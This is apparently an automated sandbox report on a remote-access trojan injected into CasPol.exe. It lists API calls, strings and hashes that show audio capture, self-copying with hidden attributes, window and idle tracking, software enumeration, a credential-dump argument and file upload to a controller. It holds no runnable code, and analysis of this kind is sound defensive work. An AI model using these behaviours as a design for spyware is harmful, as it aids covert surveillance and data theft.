                                                                                                                      • Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                                                                                                                      • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                      • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                      • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                      • API String ID: 738084811-1408154895
                                                                                                                      • Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                                                                                                                      • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                      • Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                                                                                                                      • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                      • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                      • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                      • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Write$Create
                                                                                                                      • String ID: RIFF$WAVE$data$fmt
                                                                                                                      • API String ID: 1602526932-4212202414
                                                                                                                      • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                      • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                      • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                      • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                      • API String ID: 1646373207-165202446
                                                                                                                      • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                      • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                      • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                      • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                      • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                      • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                      • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                      • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                                      • API String ID: 1579085052-1280438975
                                                                                                                      • Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                                                                                                                      • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                      • Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                                                                                                                      • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                      • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                      • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                      • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                      • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                      • String ID: ?
                                                                                                                      • API String ID: 3941738427-1684325040
                                                                                                                      • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                                      • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                      • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                                      • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899193279-0
                                                                                                                      • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                      • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                      • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                      • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                        • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                      • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                      • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                      • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                      • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                      • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                      • API String ID: 1223786279-3931108886
                                                                                                                      • Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                                                                                                                      • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                      • Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                                                                                                                      • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                      • API String ID: 2490988753-744132762
                                                                                                                      • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                      • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                      • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                      • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumOpen
                                                                                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                      • API String ID: 1332880857-3714951968
                                                                                                                      • Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                                                                                                                      • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                                                                                      • Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                                                                                                                      • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                                                                                      APIs
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                      • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                      • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                      • API String ID: 911427763-1497357211
                                                                                                                      • Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                                                                                                                      • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                      • Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                                                                                                                      • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                      APIs
                                                                                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                      • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                      • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                      • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                      • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                      • String ID: Close
                                                                                                                      • API String ID: 1657328048-3535843008
                                                                                                                      • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                      • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                      • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                      • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2509303402-0
                                                                                                                      • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                      • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                      • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                      • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                      • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                      • API String ID: 1884690901-3066803209
                                                                                                                      • Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                                                                                                                      • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                      • Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                                                                                                                      • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                        • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                        • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                        • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                        • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                        • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                      • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                      • API String ID: 3795512280-3163867910
                                                                                                                      • Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                                                                                                                      • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                      • Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                                                                                                                      • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                        • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                      • _free.LIBCMT ref: 004500B6
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 004500D8
                                                                                                                      • _free.LIBCMT ref: 004500ED
                                                                                                                      • _free.LIBCMT ref: 004500F8
